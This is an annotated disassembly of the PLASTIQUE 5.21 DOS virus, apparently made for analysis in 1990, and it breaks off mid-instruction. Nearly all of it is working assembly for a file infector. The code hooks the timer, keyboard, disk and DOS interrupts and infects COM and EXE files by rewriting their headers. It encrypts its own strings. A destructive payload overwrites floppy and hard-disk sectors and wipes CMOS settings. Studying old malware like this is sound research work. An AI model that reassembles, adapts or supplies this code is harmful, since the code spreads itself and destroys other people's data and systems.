;--------------------------------------------------------------------------- ; PLASTIQE v:5.21 Virus code ; ; Disassembled by SI-IS, 1990.10.21. ;--------------------------------------------------------------------------- Org 100 0100 E9800B JMP 0C83 0103 DW ? ;Wait counter ?? 0106 DW 0,0 ;Orig INT 09 handler addres 010A DW 0,0 ;Orig INT 13 handler addres 011C DW 0 ;File handle 011E DW 0 ;File attribute 012C DB 1Ch DUP(0) ;Buffer for Exe Header 014C DW ;Ofs of file name to execute 014E DB ? 014F DB ? 0158 DW 0,0 ;New size of EXE file 015D DB ? 015E DB 'ACAD.EXE' 0166 DB 'COMMAND.COM' 0171 DB '.COM' 0175 DB '.EXE' 018B DB 'PLASTIQUE 5.21 (plastic bomb)',0D,0A 'Copyright (C) 1988-1990 by ABT Group ' '(in association with Hammer LAB.)',0D,0A 'WARNING: DON'T RUN ACAD.EXE!$' 020F DB 0 ;? 0210 DW 0 ;? 0218 DB ? ? ? ;Music Data 0321 DW 0,0 ;Orig INT 08 handler addres ;--------------------------------------------------------------------------- 03E9 32C0 XOR AL,AL ;(* Critical error handler *) 03EB CF IRET ;--------------------------------------------------------------------------- 03EC 2E803E4F0001 CMP CS:[004F],01 ;(* INT 08 HANDLER - TIMER *) 03F2 7431 JZ 0425 03F4 50 PUSH AX 03F5 2EA14A00 MOV AX,CS:[004A] 03F9 2E39060300 CMP CS:[0003],AX 03FE 58 POP AX 03FF 7711 JA 0412 0401 2EA05D00 MOV AL,CS:[005D] 0405 0455 ADD AL,55 0407 2EA25D00 MOV CS:[005D],AL 040B 7205 JC 0412 040D 2EFF060300 INC W/CS:[0003] 0412 51 PUSH CX 0413 2E8B0E0300 MOV CX,CS:[0003] 0418 90 NOP 0419 E2FD LOOP 0418 041B 59 POP CX 041C 2EFF2E2103 JMP Far CS:[0321] ;Jump to orig INT 08 handler 0421 A5 MOVSW 0422 FE00 INC B/[BX+SI] 0424 F0 LOCK 0425 2EFF060300 INC W/CS:[0003] ;(* MUSIC *) 042A 2E813E03000080 CMP CS:[0003],8000 0431 7702 JA 0435 0433 EBE7 JMP 041C ;Jump to orig INT 08 handler 0435 1E PUSH DS 0436 50 PUSH AX 0437 53 PUSH BX 0438 0E PUSH CS 0439 1F POP DS 043A 8B1E1001 MOV BX,[0110] 043E FE0E0F01 DEC B/[010F] 0442 7567 JNZ 04AB 0444 E461 IN AL,[61] ;Speaker OFF 0446 24FE AND AL,FE 0448 E661 OUT [61],AL 044A 8B1E1001 MOV BX,[0110] 044E FF061001 INC W/[0110] 0452 81FB8300 CMP BX,0083 0456 7503 JNZ 045B 0458 EB36 JMP 0490 045A 90 NOP 045B 8A871802 MOV AL,[BX+0218] 045F A20F01 MOV [010F],AL 0462 D1E3 SHL BX,1 0464 8B871201 MOV AX,[BX+0112] 0468 3D0000 CMP AX,0000 046B 7403 JZ 0470 046D EB0A JMP 0479 046F 90 NOP 0470 E461 IN AL,[61] 0472 24FE AND AL,FE 0474 E661 OUT [61],AL 0476 EB33 JMP 04AB 0478 90 NOP 0479 8BD8 MOV BX,AX 047B B0B6 MOV AL,B6 047D E643 OUT [43],AL ;Set Timer Chip 047F 8BC3 MOV AX,BX 0481 E642 OUT [42],AL 0483 8AC4 MOV AL,AH 0485 E642 OUT [42],AL 0487 E461 IN AL,[61] ;Speaker ON 0489 0C03 OR AL,03 048B E661 OUT [61],AL 048D EB1C JMP 04AB 048F 90 NOP 0490 E461 IN AL,[61] 0492 24FE AND AL,FE 0494 E661 OUT [61],AL 0496 C70610010000 MOV [0110],0000 049C C6060F0101 MOV [010F],01 04A1 B80080 MOV AX,8000 04A4 22260500 AND AH,[0005] 04A8 A30300 MOV [0003],AX 04AB 5B POP BX 04AC 58 POP AX 04AD 1F POP DS 04AE E96BFF JMP 041C ;--------------------------------------------------------------------------- 04B1 FA CLI ;(* INT 09 HANDLER - KEYBOARD *) 04B2 50 PUSH AX 04B3 1E PUSH DS 04B4 33C0 XOR AX,AX 04B6 8ED8 MOV DS,AX 04B8 A01704 MOV AL,[0417] 04BB 1F POP DS 04BC 240C AND AL,0C 04BE 3C0C CMP AL,0C 04C0 752E JNZ 04F0 04C2 E460 IN AL,[60] 04C4 247F AND AL,7F 04C6 3C53 CMP AL,53 04C8 7526 JNZ 04F0 04CA 2E813E03000080 CMP CS:[0003],8000 04D1 721D JC 04F0 04D3 2E803E4F0001 CMP CS:[004F],01 04D9 7403 JZ 04DE 04DB EB13 JMP 04F0 04DD 90 NOP 04DE E461 IN AL,[61] 04E0 0C80 OR AL,80 04E2 E661 OUT [61],AL 04E4 247F AND AL,7F 04E6 E661 OUT [61],AL 04E8 58 POP AX 04E9 B020 MOV AL,20 04EB E620 OUT [20],AL 04ED EB0A JMP 04F9 04EF 90 NOP 04F0 58 POP AX 04F1 9C PUSHF 04F2 2EFF1E0600 CALL Far CS:[0006] 04F7 FB STI 04F8 CF IRET ;--------------------------------------------------------------------------- 04F9 0E PUSH CS 04FA 58 POP AX 04FB 8ED8 MOV DS,AX 04FD 8EC0 MOV ES,AX 04FF B002 MOV AL,02 0501 E621 OUT [21],AL 0503 FB STI 0504 E461 IN AL,[61] 0506 24FE AND AL,FE 0508 E661 OUT [61],AL 050A C70610010000 MOV [0110],0000 0510 C6060F0101 MOV [010F],01 0515 C70603004C7F MOV [0003],7F4C 051B B80400 MOV AX,0004 ;Set video mode to Groph 320x200 051E CD10 INT 10 ; 0520 B8070E MOV AX,0E07 ;Write teletype - Bell 0523 CD10 INT 10 0525 BEA202 MOV SI,02A2 0528 E87300 CALL 059E 052B E87000 CALL 059E 052E E83A00 CALL 056B 0531 E83700 CALL 056B 0534 C606BA0201 MOV [02BA],01 0539 BEA202 MOV SI,02A2 053C E87E00 CALL 05BD 053F E87B00 CALL 05BD 0542 E87800 CALL 05BD 0545 E87500 CALL 05BD 0548 803EBA0201 CMP [02BA],01 054D 7402 JZ 0551 054F EBE3 JMP 0534 0551 E460 IN AL,[60] 0553 8AE0 MOV AH,AL 0555 E470 IN AL,[70] 0557 3AC4 CMP AL,AH 0559 740D JZ 0568 055B B94000 MOV CX,0040 055E 8AC1 MOV AL,CL 0560 E670 OUT [70],AL 0562 B0FF MOV AL,FF 0564 E671 OUT [71],AL 0566 E2F6 LOOP 055E 0568 F4 HLT 0569 EBFD JMP 0568 056B C60400 MOV [SI],00 056E B80102 MOV AX,0201 0571 B90100 MOV CX,0001 0574 B600 MOV DH,00 0576 8A5404 MOV DL,[SI+04] 0579 BB0010 MOV BX,1000 057C E87B00 CALL 05FA 057F 7219 JC 059A 0581 C60401 MOV [SI],01 0584 BF1800 MOV DI,0018 0587 8B8D0010 MOV CX,[DI+1000] 058B 884C01 MOV [SI+01],CL 058E BF1A00 MOV DI,001A 0591 8B8D0010 MOV CX,[DI+1000] 0595 FEC9 DEC CL 0597 884C05 MOV [SI+05],CL 059A 83C606 ADD SI,0006 059D C3 RET 059E C60400 MOV [SI],00 05A1 B408 MOV AH,08 05A3 8A5404 MOV DL,[SI+04] 05A6 E87600 CALL 061F 05A9 720E JC 05B9 05AB 887405 MOV [SI+05],DH 05AE 80E13F AND CL,3F 05B1 FEC9 DEC CL 05B3 884C01 MOV [SI+01],CL 05B6 C60401 MOV [SI],01 05B9 83C606 ADD SI,0006 05BC C3 RET 05BD BB8B00 MOV BX,008B 05C0 803C01 CMP [SI],01 05C3 752E JNZ 05F3 05C5 C606BA0200 MOV [02BA],00 05CA 8B4C02 MOV CX,[SI+02] 05CD B600 MOV DH,00 05CF 8A5404 MOV DL,[SI+04] 05D2 8A4401 MOV AL,[SI+01] 05D5 B403 MOV AH,03 05D7 E82000 CALL 05FA 05DA 7214 JC 05F0 05DC FEC6 INC DH 05DE 3A7405 CMP DH,[SI+05] 05E1 76EF JNA 05D2 05E3 80440301 ADD [SI+03],01 05E7 730A JNC 05F3 05E9 80440240 ADD [SI+02],40 05ED EB04 JMP 05F3 05EF 90 NOP 05F0 C60400 MOV [SI],00 05F3 83C606 ADD SI,0006 05F6 C3 RET 05F7 DB 00,09 05F9 DB 03 05FA C606F70400 MOV [04F7],00 05FF A3F804 MOV [04F8],AX 0602 E81A00 CALL 061F 0605 80E4C3 AND AH,C3 0608 7414 JZ 061E 060A B400 MOV AH,00 060C E81000 CALL 061F 060F A1F804 MOV AX,[04F8] 0612 FE06F704 INC B/[04F7] 0616 803EF70401 CMP [04F7],01 061B 76E5 JNA 0602 061D F9 STC 061E C3 RET 061F 9C PUSHF 0620 2EFF1E0A00 CALL Far CS:[000A] 0625 C3 RET ;--------------------------------------------------------------------------- ;(* INT 13 HANDLER - DISK IO *) 0626 80FC02 CMP AH,02 ;Read sector ? 0629 751B JNZ 0646 ; No 062B F6C280 TEST DL,80 ;Hard disk 062E 751A JNZ 064A ; No 0630 80FA02 CMP DL,02 ;Floppy 0633 7711 JA 0646 0635 83F902 CMP CX,0002 0638 750C JNZ 0646 063A 80FE00 CMP DH,00 063D 7507 JNZ 0646 063F EB13 JMP 0654 0641 90 NOP 0642 DB 01,00 0644 DB 80,01 0646 E92001 JMP 0769 0649 DB 00 064A 80FE01 CMP DH,01 064D 75F7 JNZ 0646 064F 80FD00 CMP CH,00 0652 75F2 JNZ 0646 0654 2E803E490502 CMP CS:[0549],02 065A 7407 JZ 0663 065C 2EFE064905 INC B/CS:[0549] 0661 EBE3 JMP 0646 0663 2EC606490500 MOV CS:[0549],00 0669 2E803E5C0001 CMP CS:[005C],01 066F 74D5 JZ 0646 0671 50 PUSH AX 0672 53 PUSH BX 0673 51 PUSH CX 0674 52 PUSH DX 0675 56 PUSH SI 0676 57 PUSH DI 0677 06 PUSH ES 0678 1E PUSH DS 0679 8CC8 MOV AX,CS 067B 8ED8 MOV DS,AX 067D 8EC0 MOV ES,AX 067F 8816DF02 MOV [02DF],DL 0683 B400 MOV AH,00 0685 E897FF CALL 061F 0688 BB0010 MOV BX,1000 068B B80102 MOV AX,0201 068E B90100 MOV CX,0001 0691 B600 MOV DH,00 0693 E889FF CALL 061F 0696 7243 JC 06DB 0698 F6C280 TEST DL,80 069B 7405 JZ 06A2 069D E8CE00 CALL 076E 06A0 7239 JC 06DB 06A2 B8CB3C MOV AX,3CCB 06A5 39473E CMP [BX+3E],AX 06A8 7518 JNZ 06C2 06AA 8B4740 MOV AX,[BX+40] 06AD 3DFEFF CMP AX,FFFE 06B0 7429 JZ 06DB 06B2 2B4742 SUB AX,[BX+42] 06B5 3D0400 CMP AX,0004 06B8 7508 JNZ 06C2 06BA E8E300 CALL 07A0 06BD 7303 JNC 06C2 06BF E99F00 JMP 0761 06C2 F606DF0280 TEST [02DF],80 06C7 7415 JZ 06DE 06C9 C606E10207 MOV [02E1],07 06CE C606E20200 MOV [02E2],00 06D3 C606E00200 MOV [02E0],00 06D8 EB3F JMP 0719 06DA 90 NOP 06DB E98300 JMP 0761 06DE C606E10201 MOV [02E1],01 06E3 C606E20228 MOV [02E2],28 06E8 8A4715 MOV AL,[BX+15] 06EB 3CFC CMP AL,FC 06ED 7305 JNC 06F4 06EF C606E20250 MOV [02E2],50 06F4 A0E202 MOV AL,[02E2] 06F7 BBBB02 MOV BX,02BB 06FA B90900 MOV CX,0009 06FD 8807 MOV [BX],AL 06FF 83C304 ADD BX,0004 0702 E2F9 LOOP 06FD 0704 B80905 MOV AX,0509 0707 BBBB02 MOV BX,02BB 070A C606E00200 MOV [02E0],00 070F C606E10201 MOV [02E1],01 0714 E8AD00 CALL 07C4 0717 7248 JC 0761 0719 BB0000 MOV BX,0000 071C A1E102 MOV AX,[02E1] 071F A3440E MOV [0E44],AX 0722 A1DF02 MOV AX,[02DF] 0725 A3460E MOV [0E46],AX 0728 B80903 MOV AX,0309 072B E89600 CALL 07C4 072E 7231 JC 0761 0730 C606E10201 MOV [02E1],01 0735 C606E20200 MOV [02E2],00 073A F6C280 TEST DL,80 073D 740C JZ 074B 073F A14205 MOV AX,[0542] 0742 A3E102 MOV [02E1],AX 0745 A14405 MOV AX,[0544] 0748 A3DF02 MOV [02DF],AX 074B BE0310 MOV SI,1003 074E BF030E MOV DI,0E03 0751 B92300 MOV CX,0023 0754 90 NOP 0755 FC CLD 0756 F3A4 REP MOVSB 0758 BB000E MOV BX,0E00 075B B80103 MOV AX,0301 075E E86300 CALL 07C4 0761 1F POP DS 0762 07 POP ES 0763 5F POP DI 0764 5E POP SI 0765 5A POP DX 0766 59 POP CX 0767 5B POP BX 0768 58 POP AX 0769 2EFF2E0A00 JMP Far CS:[000A] 076E BEBE11 MOV SI,11BE 0771 B304 MOV BL,04 0773 803C80 CMP [SI],80 0776 740E JZ 0786 0778 803C00 CMP [SI],00 077B 7507 JNZ 0784 077D 83C610 ADD SI,0010 0780 FECB DEC BL 0782 75EF JNZ 0773 0784 F9 STC 0785 C3 RET 0786 8B04 MOV AX,[SI] 0788 A34405 MOV [0544],AX 078B 8B4402 MOV AX,[SI+02] 078E A34205 MOV [0542],AX 0791 8B14 MOV DX,[SI] 0793 8B4C02 MOV CX,[SI+02] 0796 B80102 MOV AX,0201 0799 BB0010 MOV BX,1000 079C E85BFE CALL 05FA 079F C3 RET 07A0 8B4740 MOV AX,[BX+40] 07A3 33D2 XOR DX,DX 07A5 F77718 DIV W/[BX+18] 07A8 FEC2 INC DL 07AA 8816E102 MOV [02E1],DL 07AE 33D2 XOR DX,DX 07B0 F7771A DIV W/[BX+1A] 07B3 8816E002 MOV [02E0],DL 07B7 A2E202 MOV [02E2],AL 07BA B80102 MOV AX,0201 07BD BB0010 MOV BX,1000 07C0 E80100 CALL 07C4 07C3 C3 RET 07C4 8B0EE102 MOV CX,[02E1] 07C8 8B16DF02 MOV DX,[02DF] 07CC E82BFE CALL 05FA 07CF C3 RET 07D0 60 07D1 1478 07D3 02 ;--------------------------------------------------------------------------- 07D4 9C PUSHF ;(* INT 21 HANDLER - DOS FUNC *) 07D5 3D404B CMP AX,4B40 ;AL = 40 - Invalid call 07D8 7505 JNZ 07DF 07DA B87856 MOV AX,5678 ;Detect Plastiqe ? 07DD 9D POPF 07DE CF IRET 07DF 3D414B CMP AX,4B41 ;AL = 41 - Invalid call 07E2 741E JZ 0802 07E4 3D004B CMP AX,4B00 ;AX = 4B00 - Load And Run Program 07E7 7503 JNZ 07EC 07E9 EB34 JMP 081F 07EB 90 NOP 07EC 3D003D CMP AX,3D00 ;AX = 3D00 - Open File to Read 07EF 750B JNZ 07FC 07F1 2E803E4E0001 CMP CS:[004E],01 07F7 7403 JZ 07FC 07F9 EB24 JMP 081F 07FB 90 NOP 07FC 9D POPF 07FD 2EFF2ED006 JMP Far CS:[06D0] ;Jump to orig Dos handler 0802 58 POP AX 0803 58 POP AX 0804 B80001 MOV AX,0100 0807 2EA31400 MOV CS:[0014],AX 080B 58 POP AX 080C 2EA31600 MOV CS:[0016],AX 0810 F3A4 REP MOVSB 0812 9D POPF 0813 E88003 CALL 0B96 ;Zero register 0816 8B0E2400 MOV CX,[0024] 081A 2EFF2E1400 JMP Far CS:[0014] 081F 2EC7061C00FFFF MOV CS:[001C],FFFF ; 0826 2EC70648000000 MOV CS:[0048],0000 082D 2E89161800 MOV CS:[0018],DX ;Name of file to execute 0832 2E8C1E1A00 MOV CS:[001A],DS 0837 50 PUSH AX 0838 53 PUSH BX 0839 51 PUSH CX 083A 52 PUSH DX 083B 56 PUSH SI 083C 57 PUSH DI 083D 1E PUSH DS 083E 06 PUSH ES 083F FC CLD 0840 8BF2 MOV SI,DX 0842 8A04 MOV AL,[SI] ;Convert file name to UpperCase 0844 0AC0 OR AL,AL 0846 740E JZ 0856 0848 3C61 CMP AL,61 ;'a' 084A 7207 JC 0853 084C 3C7A CMP AL,7A ;'z' 084E 7703 JA 0853 0850 802C20 SUB [SI],20 0853 46 INC SI 0854 EBEC JMP 0842 0856 2E89364C00 MOV CS:[004C],SI ;SI = ptr to End of ASCIIZ fname 085B 8BC6 MOV AX,SI 085D 0E PUSH CS 085E 07 POP ES 085F B90B00 MOV CX,000B ;Length of string 0862 2BF1 SUB SI,CX 0864 BF6600 MOV DI,0066 ;Ptr to 'COMMAND.COM' string 0867 F3A6 REP CMPSB ;File name = 'COMMAND.COM' ? 0869 7503 JNZ 086E ; No 086B E9F702 JMP 0B65 ; Yes - Exit from handler 086E 8BF0 MOV SI,AX 0870 B90800 MOV CX,0008 ;Length of string 0873 2BF1 SUB SI,CX 0875 BF5E00 MOV DI,005E ;Ptr to 'ACAD.EXE' string 0878 F3A6 REP CMPSB ;File name = 'ACAD.EXE' ? 087A 751C JNZ 0898 ; No 087C 0E PUSH CS ; Yes 087D 1F POP DS 087E 0E PUSH CS 087F 07 POP ES 0880 B409 MOV AH,09 ;Print String 0882 BA8B00 MOV DX,008B ; Virus (c) & WARNING 0885 CD21 INT 21 0887 C6064F0001 MOV [004F],01 088C C70603000080 MOV [0003],8000 0892 BEAE02 MOV SI,02AE 0895 E996FC JMP 052E ;jmp to music rutin (halt proc) 0898 B80043 MOV AX,4300 ;Get file attribute 089B CD21 INT 21 089D 7205 JC 08A4 089F 2E890E1E00 MOV CS:[001E],CX ;Save it 08A4 7271 JC 0917 08A6 32C0 XOR AL,AL 08A8 2EA22B00 MOV CS:[002B],AL 08AC 2E8B364C00 MOV SI,CS:[004C] 08B1 B90400 MOV CX,0004 ;Length of string 08B4 2BF1 SUB SI,CX 08B6 BF7100 MOV DI,0071 ;Ptr to '.COM' string 08B9 F3A6 REP CMPSB ;File extension = '.COM' ? 08BB 741C JZ 08D9 ; Yes 08BD 2EFE062B00 INC B/CS:[002B] 08C2 2E8B364C00 MOV SI,CS:[004C] 08C7 B90400 MOV CX,0004 ;Length of string 08CA 2BF1 SUB SI,CX 08CC BF7500 MOV DI,0075 ;Ptr to '.EXE' string 08CF F3A6 REP CMPSB ;File extension = '.EXE' ? 08D1 7406 JZ 08D9 ; Yes 08D3 83C1FF ADD CX,FFFF ; No 08D6 EB3F JMP 0917 08D8 90 NOP 08D9 8BFA MOV DI,DX 08DB 32D2 XOR DL,DL 08DD 807D013A CMP [DI+01],3A 08E1 7505 JNZ 08E8 08E3 8A15 MOV DL,[DI] 08E5 80E21F AND DL,1F 08E8 B436 MOV AH,36 ;Get disk free space 08EA CD21 INT 21 08EC 3DFFFF CMP AX,FFFF ; = Set carry flag 08EF 7503 JNZ 08F4 08F1 E97102 JMP 0B65 08F4 F7E3 MUL BX 08F6 F7E1 MUL CX 08F8 0BD2 OR DX,DX 08FA 7505 JNZ 0901 08FC 3D0010 CMP AX,1000 ;Available Space > 4096 ? 08FF 72F0 JC 08F1 0901 2E8B161800 MOV DX,CS:[0018] 0906 B8003D MOV AX,3D00 ;Open file to read 0909 2EC6064E0001 MOV CS:[004E],01 090F CD21 INT 21 0911 2EC6064E0000 MOV CS:[004E],00 0917 7267 JC 0980 0919 2EA31C00 MOV CS:[001C],AX 091D 8BD8 MOV BX,AX ;BX = File handle 091F B80242 MOV AX,4202 ;Set file pos to EOF 0922 B9FFFF MOV CX,FFFF 0925 BAFBFF MOV DX,FFFB 0928 CD21 INT 21 092A 7254 JC 0980 092C 050500 ADD AX,0005 092F 2EA32400 MOV CS:[0024],AX 0933 B80042 MOV AX,4200 ;Set file pos 0 0936 B90000 MOV CX,0000 0939 BA1200 MOV DX,0012 093C CD21 INT 21 093E 7240 JC 0980 0940 B90200 MOV CX,0002 ;Read 2 byte 0943 BA4600 MOV DX,0046 0946 8BFA MOV DI,DX 0948 8CC8 MOV AX,CS 094A 8ED8 MOV DS,AX 094C 8EC0 MOV ES,AX 094E B43F MOV AH,3F 0950 CD21 INT 21 0952 8B05 MOV AX,[DI] 0954 3D8919 CMP AX,1989 0957 7507 JNZ 0960 0959 B43E MOV AH,3E ;Close file 095B CD21 INT 21 095D E90502 JMP 0B65 0960 B82435 MOV AX,3524 ;Get INT 24 vector 0963 CD21 INT 21 ; (Critical error handler) 0965 891EE502 MOV [02E5],BX ;Store it 0969 8C06E702 MOV [02E7],ES 096D BAE902 MOV DX,02E9 0970 B82425 MOV AX,2524 0973 CD21 INT 21 0975 C5161800 LDS DX,[0018] 0979 33C9 XOR CX,CX 097B B80143 MOV AX,4301 ;Set file attribute 097E CD21 INT 21 0980 723B JC 09BD 0982 2E8B1E1C00 MOV BX,CS:[001C] 0987 B43E MOV AH,3E ;Close file 0989 CD21 INT 21 098B 2EC7061C00FFFF MOV CS:[001C],FFFF 0992 B8023D MOV AX,3D02 ;Open file to Write 0995 CD21 INT 21 0997 7224 JC 09BD 0999 2EA31C00 MOV CS:[001C],AX ;Store handle 099D 8CC8 MOV AX,CS 099F 8ED8 MOV DS,AX 09A1 8EC0 MOV ES,AX 09A3 8B1E1C00 MOV BX,[001C] 09A7 B80057 MOV AX,5700 ;Get file date 09AA CD21 INT 21 09AC 89162000 MOV [0020],DX ;Store it 09B0 890E2200 MOV [0022],CX 09B4 B80042 MOV AX,4200 ;Set file pos to 0 09B7 33C9 XOR CX,CX 09B9 8BD1 MOV DX,CX 09BB CD21 INT 21 09BD 725F JC 0A1E 09BF 803E2B0000 CMP [002B],00 ;File type ? 0 if .COM 09C4 7403 JZ 09C9 09C6 EB72 JMP 0A3A 09C8 90 NOP ;INFECT COM FILE --------------- 09C9 BB0010 MOV BX,1000 ;Allocate 1000h paragraphs 09CC B448 MOV AH,48 09CE CD21 INT 21 09D0 730B JNC 09DD ;Ok, mem allocated 09D2 B43E MOV AH,3E ;Error, Close file 09D4 8B1E1C00 MOV BX,[001C] 09D8 CD21 INT 21 09DA E98801 JMP 0B65 ;Exit from handler 09DD FF064800 INC W/[0048] 09E1 8EC0 MOV ES,AX ;Segment of allocated memory 09E3 33F6 XOR SI,SI 09E5 8BFE MOV DI,SI 09E7 A10300 MOV AX,[0003] 09EA 0C01 OR AL,01 09EC 813E03000080 CMP [0003],8000 09F2 7202 JC 09F6 09F4 B000 MOV AL,00 09F6 A20500 MOV [0005],AL 09F9 C6065C0001 MOV [005C],01 09FE E87201 CALL 0B73 ;DeCode text 0A01 B90010 MOV CX,1000 0A04 F3A4 REP MOVSB ;Move virus to begin of block 0A06 E86A01 CALL 0B73 ;Code text 0A09 C6065C0000 MOV [005C],00 0A0E 8BD7 MOV DX,DI ;Addr of buffer 0A10 8B0E2400 MOV CX,[0024] ;Nr Of Bytes to read 0A14 8B1E1C00 MOV BX,[001C] ;Handle 0A18 06 PUSH ES 0A19 1F POP DS 0A1A B43F MOV AH,3F ;Read from file 0A1C CD21 INT 21 0A1E 7215 JC 0A35 0A20 03F9 ADD DI,CX ;DI = New file size 0A22 7211 JC 0A35 0A24 33C9 XOR CX,CX 0A26 8BD1 MOV DX,CX 0A28 B80042 MOV AX,4200 ;Set file pos to 0 0A2B CD21 INT 21 0A2D 8BCF MOV CX,DI ;Write To File Virus + Orig code 0A2F 33D2 XOR DX,DX 0A31 B440 MOV AH,40 0A33 CD21 INT 21 0A35 720D JC 0A44 0A37 E9E600 JMP 0B20 ;INFECT EXE FILES 0A3A B91C00 MOV CX,001C ;Read 1C byte from begin of file 0A3D BA2C00 MOV DX,002C 0A40 B43F MOV AH,3F 0A42 CD21 INT 21 0A44 7252 JC 0A98 0A46 813E3E008919 CMP [003E],1989 ;If INFECTED 0A4C 744A JZ 0A98 ;>> Here equal - Exit handler 0A4E C7063E008919 MOV [003E],1989 0A54 A13A00 MOV AX,[003A] ;SS 0A57 A35600 MOV [0056],AX 0A5A A13C00 MOV AX,[003C] ;SP 0A5D A35000 MOV [0050],AX 0A60 A14000 MOV AX,[0040] ;IP 0A63 A35200 MOV [0052],AX 0A66 A14200 MOV AX,[0042] ;CS 0A69 A35400 MOV [0054],AX 0A6C A13000 MOV AX,[0030] 0A6F 833E2E0000 CMP [002E],0000 0A74 7401 JZ 0A77 0A76 48 DEC AX 0A77 F7267B00 MUL W/[007B] 0A7B 03062E00 ADD AX,[002E] 0A7F 83D200 ADC DX,0000 0A82 050F00 ADD AX,000F 0A85 83D200 ADC DX,0000 0A88 25F0FF AND AX,FFF0 0A8B A35800 MOV [0058],AX 0A8E 89165A00 MOV [005A],DX 0A92 050010 ADD AX,1000 0A95 83D200 ADC DX,0000 0A98 723A JC 0AD4 0A9A F7367B00 DIV W/[007B] 0A9E 0BD2 OR DX,DX 0AA0 7401 JZ 0AA3 0AA2 40 INC AX 0AA3 A33000 MOV [0030],AX 0AA6 89162E00 MOV [002E],DX 0AAA A15800 MOV AX,[0058] 0AAD 8B165A00 MOV DX,[005A] 0AB1 F7367900 DIV W/[0079] 0AB5 2B063400 SUB AX,[0034] 0AB9 A34200 MOV [0042],AX ;NEW CS 0ABC C7064000B80B MOV [0040],0BB8 ;NEW IP 0AC2 A33A00 MOV [003A],AX ;NEW SS 0AC5 C7063C00FE0D MOV [003C],0DFE ;NEW SP 0ACB 33C9 XOR CX,CX 0ACD 8BD1 MOV DX,CX 0ACF B80042 MOV AX,4200 ;Set file pos to 0 0AD2 CD21 INT 21 0AD4 720A JC 0AE0 0AD6 B91C00 MOV CX,001C ;Write NEW Exe header 0AD9 BA2C00 MOV DX,002C 0ADC B440 MOV AH,40 0ADE CD21 INT 21 0AE0 7211 JC 0AF3 0AE2 3BC1 CMP AX,CX ;Write succesfull ? 0AE4 753A JNZ 0B20 0AE6 8B165800 MOV DX,[0058] ;Set file pos to End of Orig file 0AEA 8B0E5A00 MOV CX,[005A] ; + 0..15 (paragraph alignment) 0AEE B80042 MOV AX,4200 0AF1 CD21 INT 21 0AF3 722B JC 0B20 0AF5 A10300 MOV AX,[0003] 0AF8 0C01 OR AL,01 0AFA 813E03000080 CMP [0003],8000 0B00 7202 JC 0B04 0B02 B000 MOV AL,00 0B04 A20500 MOV [0005],AL 0B07 C6065C0001 MOV [005C],01 0B0C E86400 CALL 0B73 0B0F 33D2 XOR DX,DX 0B11 B90010 MOV CX,1000 ;Write virus to file 0B14 B440 MOV AH,40 0B16 CD21 INT 21 0B18 E85800 CALL 0B73 0B1B C6065C0000 MOV [005C],00 0B20 2E833E480000 CMP CS:[0048],0000 0B26 7404 JZ 0B2C 0B28 B449 MOV AH,49 ;Free allocated memory block 0B2A CD21 INT 21 0B2C 2E833E1C00FF CMP CS:[001C],FFFF 0B32 7431 JZ 0B65 0B34 2E8B1E1C00 MOV BX,CS:[001C] 0B39 2E8B162000 MOV DX,CS:[0020] 0B3E 2E8B0E2200 MOV CX,CS:[0022] 0B43 B80157 MOV AX,5701 ;Set file time 0B46 CD21 INT 21 0B48 B43E MOV AH,3E ;Close file 0B4A CD21 INT 21 0B4C 2EC5161800 LDS DX,CS:[0018] 0B51 2E8B0E1E00 MOV CX,CS:[001E] 0B56 B80143 MOV AX,4301 ;Set file attribute 0B59 CD21 INT 21 0B5B 2EC516E502 LDS DX,CS:[02E5] 0B60 B82425 MOV AX,2524 ;Set INT 24 to orig (Crit Err) 0B63 CD21 INT 21 0B65 07 POP ES 0B66 1F POP DS 0B67 5F POP DI 0B68 5E POP SI 0B69 5A POP DX 0B6A 59 POP CX 0B6B 5B POP BX 0B6C 58 POP AX 0B6D 9D POPF 0B6E 2EFF2ED006 JMP Far CS:[06D0] ;--------------------------------------------------------------------------- 0B73 1E PUSH DS ;Decode Text 0B74 06 PUSH ES 0B75 57 PUSH DI 0B76 56 PUSH SI 0B77 51 PUSH CX 0B78 50 PUSH AX 0B79 0E PUSH CS 0B7A 07 POP ES 0B7B 0E PUSH CS 0B7C 1F POP DS 0B7D BE5E00 MOV SI,005E 0B80 8BFE MOV DI,SI 0B82 B9B100 MOV CX,00B1 0B85 8A260500 MOV AH,[0005] 0B89 AC LODSB 0B8A 32C4 XOR AL,AH 0B8C AA STOSB 0B8D E2FA LOOP 0B89 0B8F 58 POP AX 0B90 59 POP CX 0B91 5E POP SI 0B92 5F POP DI 0B93 07 POP ES 0B94 1F POP DS 0B95 C3 RET ;--------------------------------------------------------------------------- 0B96 33C0 XOR AX,AX ;Zero Registers 0B98 8BD8 MOV BX,AX 0B9A 8BD0 MOV DX,AX 0B9C 8BF0 MOV SI,AX 0B9E 8BF8 MOV DI,AX 0BA0 C3 RET ;--------------------------------------------------------------------------- ;Detect Speed of machine 0BA1 B400 MOV AH,00 ;Read system timer counter 0BA3 CD1A INT 1A 0BA5 8BDA MOV BX,DX ;BX=DX - Low order part of clock 0BA7 CD1A INT 1A ;Read system timer counter 0BA9 3BDA CMP BX,DX 0BAB 74FA JZ 0BA7 0BAD 33F6 XOR SI,SI 0BAF 8BDA MOV BX,DX 0BB1 CD1A INT 1A 0BB3 46 INC SI 0BB4 3BDA CMP BX,DX 0BB6 74F9 JZ 0BB1 0BB8 2EC7064A0000A0 MOV CS:[004A],A000 0BBF 8BDE MOV BX,SI 0BC1 83EB50 SUB BX,0050 0BC4 81FB000A CMP BX,0A00 0BC8 7309 JNC 0BD3 0BCA B104 MOV CL,04 0BCC D3E3 SHL BX,CL 0BCE 2E891E4A00 MOV CS:[004A],BX 0BD3 C3 RET ;--------------------------------------------------------------------------- 0BD4 1E PUSH DS ;Init timer variables 0BD5 0E PUSH CS 0BD6 1F POP DS 0BD7 C6064F0000 MOV [004F],00 0BDC C6065C0000 MOV [005C],00 0BE1 E440 IN AL,[40] 0BE3 8AE0 MOV AH,AL 0BE5 E440 IN AL,[40] 0BE7 8AC4 MOV AL,AH 0BE9 2E32060500 XOR AL,CS:[0005] 0BEE 3C1F CMP AL,1F 0BF0 7205 JC 0BF7 0BF2 C6064F0001 MOV [004F],01 0BF7 C70603000100 MOV [0003],0001 0BFD C70610010000 MOV [0110],0000 0C03 C6060F0101 MOV [010F],01 0C08 C6064E0000 MOV [004E],00 0C0D 1F POP DS 0C0E C3 RET ;--------------------------------------------------------------------------- 0C0F 1E PUSH DS 0C10 06 PUSH ES 0C11 33C0 XOR AX,AX 0C13 8ED8 MOV 